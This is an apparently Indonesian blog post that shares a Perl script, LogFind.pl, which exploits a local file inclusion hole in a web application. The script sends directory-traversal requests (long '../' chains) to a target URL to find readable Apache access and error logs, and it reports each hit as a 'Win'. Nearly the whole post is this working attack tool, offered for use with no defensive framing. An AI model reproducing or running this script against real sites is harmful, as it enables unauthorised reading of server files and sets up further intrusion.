ni ada source lagi an dapet.....
find HTTP Log`s--==
================================================
#!/usr/bin/perl
2.
use LWP::UserAgent;
3.
my $ua = LWP::UserAgent->new;
4.
$ua->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.4');
5.
use strict;
6.
7.
sub usage{
8.
print "\nLogFind.pl <max dir transversal> <LFI Url>\n";
9.
print "LogFind.pl 5 http://ww.hackxors.com/view.php?file=\n";
10.
print "[+] This will go through the first bunch of logs going back one directory each loop until its done five transversals\n[+] Then just go through the other logs in /var/, /etc/, etc..\n\n";
11.
exit;
12.
}
13.
14.
sub getreq($){
15.
my $url = $_[0];
16.
my $request = HTTP::Request->new(GET => $url);
17.
my $myrequest = $ua->request($request);
18.
if($myrequest->is_success){
19.
return $myrequest->content;
20.
}
21.
else{
22.
print "[e] Connection error - " . $myrequest->status_line . "\n";
23.
return 0;
24.
}
25.
}
26.
27.
&usage unless @ARGV==2;
28.
my($max,$url,$tmp,$logtext,@flogs,@slogs,@checks,@wins) = (@ARGV);
29.
30.
@flogs = ( #For directory transversal
31.
"apache/logs/error_log",
32.
"apache/logs/error.log",
33.
"apache/logs/access_log",
34.
"apache/logs/access.log",
35.
"logs/error_log",
36.
"logs/error.log",
37.
"logs/access_log",
38.
"logs/access.log",
39.
);
40.
41.
@slogs = ( #Already transversed LoLz
42.
"../../../../../../../../../../etc/httpd/logs/error_log",
43.
"../../../../../../../../../../etc/httpd/logs/error.log",
44.
"../../../../../../../../../../etc/httpd/logs/access_log",
45.
"../../../../../../../../../../etc/httpd/logs/access.log",
46.
"../../../../../../../../../../var/log/apache/error_log",
47.
"../../../../../../../../../../var/log/apache/error.log",
48.
"../../../../../../../../../../var/log/apache/access_log",
49.
"../../../../../../../../../../var/log/apache/access.log",
50.
"../../../../../../../../../../var/log/apache2/error_log",
51.
"../../../../../../../../../../var/log/apache2/error.log",
52.
"../../../../../../../../../../var/log/apache2/access_log",
53.
"../../../../../../../../../../var/log/apache2/access.log",
54.
"../../../../../../../../../../var/www/logs/error_log",
55.
"../../../../../../../../../../var/www/logs/error.log",
56.
"../../../../../../../../../../var/www/logs/access_log",
57.
"../../../../../../../../../../var/www/logs/access.log",
58.
"../../../../../../../../../../usr/local/apache/logs/error_log",
59.
"../../../../../../../../../../usr/local/apache/logs/error.log",
60.
"../../../../../../../../../../usr/local/apache/logs/access_log",
61.
"../../../../../../../../../../usr/local/apache/logs/access.log",
62.
"../../../../../../../../../../var/log/error_log",
63.
"../../../../../../../../../../var/log/error.log",
64.
"../../../../../../../../../../var/log/access_log",
65.
"../../../../../../../../../../var/log/access.log"
66.
);
67.
68.
69.
$logtext = "GET (.*?) HTTP";
70.
foreach my $log(@flogs){
71.
$tmp="";
72.
for(1..$max){
73.
$tmp .= "../";
74.
push(@checks,$url.$tmp.$log."");
75.
}
76.
}
77.
foreach(@slogs){
78.
push(@checks,$url.$_."");
79.
}
80.
foreach my $chk(@checks){
81.
if(&getreq($chk)=~m/$logtext/){
82.
print "[+] Win - $chk\n";
83.
push(@wins,$chk);
84.
}
85.
else{
86.
print "[+] Fail - $chk\n";
87.
}
88.
}
89.
print "[+] Wins:\n";
90.
foreach(@wins){
91.
print "$_\n";
92.
}sumber : ABH
0 komentar:
Posting Komentar